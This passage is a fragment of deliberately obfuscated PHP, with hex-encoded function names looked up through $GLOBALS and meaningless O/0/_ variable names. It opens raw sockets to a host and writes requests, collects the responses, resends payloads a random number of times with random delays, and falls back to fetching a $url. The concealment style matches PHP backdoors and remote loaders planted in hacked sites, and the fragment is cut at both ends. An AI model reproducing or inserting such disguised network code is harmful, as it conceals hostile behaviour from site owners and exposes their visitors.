);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x5f\x30\x4f\x30\x4f"]($O_O_O
O_000,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x5f\x4f\x5f\x30\x5f"
]($O_O_OO_000,$O__0O_0O0O);if(!$O0O00_O_O_){$O0O_00__OO=${"\x47\x4c\x4f\x42\x41\x4c\x5
3"}["\x4f\x5f\x4f\x4f\x5f\x5f\x4f\x30\x30\x30"]($O_O_OO_000);if(!$O0O_00__OO["\x74\x69
\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30
\x4f\x4f\x5f\x4f\x5f\x30\x30"]($O_O_OO_000)){$O0_O_0_0OO=${"\x47\x4c\x4f\x42\x41\x4c\x
53"}["\x4f\x5f\x30\x5f\x4f\x5f\x4f\x30\x4f\x30"]($O_O_OO_000);if($O0_O_0_0OO&&($O0_O_0
_0OO=="\\r\\n"||$O0_O_0_0OO=="\\n")){break;}unset($O0_O_0_0OO);}while(!${"\x47\x4c\x4f
\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x5f\x4f\x5f\x30\x30"]($O_O_OO_000)){$O_0O_O0O
0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x5f\x30\x30\x30\x4f"]($O_O_
OO_000,8192);$OOO0_0__0O.=$O_0O_O0O0_;unset($O_0O_O0O0_);}}unset($O0O_00__OO);}${"\x47
\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x5f\x30\x4f\x4f\x30"]($O_O_OO_000);}e
lse{if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x5f\x4f\x30\x30\x4f"]($
O000__OO_O,-1)==\'e\'){$O_O_O000O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30
\x5f\x30\x5f\x4f\x4f\x30"]($O0O0O__O0_);$O_O_OO_000=$O000__OO_O(AF_INET,SOCK_STREAM,0)
;if(socket_connect($O_O_OO_000,$O_O_O000O_,$O_O0O_O00_)){if(!$O0O00_O_O_){socket_write
($O_O_OO_000,$O__0O_0O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x4f\x
5f\x5f\x30\x4f"]($O__0O_0O0O));while($O_O0OO_00_=@socket_read($O_O_OO_000,8192)){$OOO0
_0__0O.=$O_O0OO_00_;unset($O_O0OO_00_);}$OOO0_0__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}[
"\x4f\x5f\x30\x30\x4f\x4f\x5f\x4f\x30\x5f"]("\\r\\n\\r\\n",$OOO0_0__0O);${"\x47\x4c\x4
f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x4f\x30\x30\x5f\x30\x4f"]($OOO0_0__0O);$OOO0_0__
0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x5f\x30\x5f\x4f\x30"]("\\r\
\n\\r\\n",$OOO0_0__0O);}else{$OO_0O0O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x
5f\x5f\x4f\x30\x4f\x30\x5f\x30"](2,5);$OO_O000_O_=0;while($OO_O000_O_<$OO_0O0O0__){soc
ket_write($O_O_OO_000,$O__0O_0O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\
x4f\x4f\x5f\x5f\x30\x4f"]($O__0O_0O0O));$OO_O000_O_++;${"\x47\x4c\x4f\x42\x41\x4c\x53"
}["\x4f\x4f\x30\x4f\x5f\x4f\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\
x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x30"](50000,100000));}unset($OO_O000_O_,$OO_0O0O0__);}
}socket_close($O_O_OO_000);unset($O_O_O000O_);}}if($OOO0_0__0O==\'\'){if(${"\x47\x4c\x
4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x4f\x30\x5f"](${"\x47\x4c\x4f\x42\x
41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x30\x5f\x4f\x30\x5f"]) and $url){$OOO0_0__0O=@${"\x